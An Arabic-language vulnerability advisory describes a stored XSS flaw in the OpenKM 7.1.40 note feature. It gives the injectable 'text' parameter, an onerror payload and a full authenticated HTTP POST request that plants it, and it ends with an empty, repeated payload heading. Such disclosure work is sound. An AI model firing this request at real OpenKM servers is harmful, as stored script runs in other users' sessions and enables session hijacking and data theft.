
توجد ثغرة تخزينية للبرمجة النصية عبر المواقع (XSS) في OpenKM الإصدار 7.1.40.
توجد ثغرة تخزينية للبرمجة النصية عبر المواقع (XSS) في إصدار OpenKM 7.1.40 (dbb6e88) مع الإضافة الاحترافية، تسمح لمستخدم مُوثَّق برفع ملاحظة على ملف تعمل كحمولة XSS مخزنة. أي مستخدم يفتح ملاحظة ملف مستند سيؤدي إلى تشغيل XSS.
المعامل المُعرَّض للخطر: text
Payload :
FINAL Payload (URL encoded) : <image/src/onerror%3dalert(1)>
طلب GET على [http://localhost/openkm/rest/note/nodes/NODE-ID] :
POST /openkm/rest/note/nodes/34bc430a-e3db-4efa-8289-3d0894010f67 HTTP/2
Host: EXAMPLE.COM
Cookie: lang=en-GB; JSESSIONID=EC6EF7B1DB85C3A839C9D3054095AA8E
Content-Length: 23
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"
X-Requested-App: kcenter
Sec-Ch-Ua-Mobile: ?0
Authorization: OKM ey[REDACTED]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/plain, */*
Sec-Ch-Ua-Platform: "Windows"
Origin: https://EXAMPLE.COM
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://EXAMPLE.COM/openkm
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
text=<image/src/onerror%3dalert(1)>
يسمح XSS التخزيني للمهاجمين بحقن نصوص برمجية ضارة في تطبيق ويب، يتم تخزينها وتنفيذها عندما يشاهد مستخدمون آخرون الصفحة المتأثرة. يمكن أن يؤدي ذلك إلى سرقة معلومات حساسة، أو اختطاف الجلسات، أو توزيع برامج ضارة.

Payload :
FINAL Payload (URL encoded) :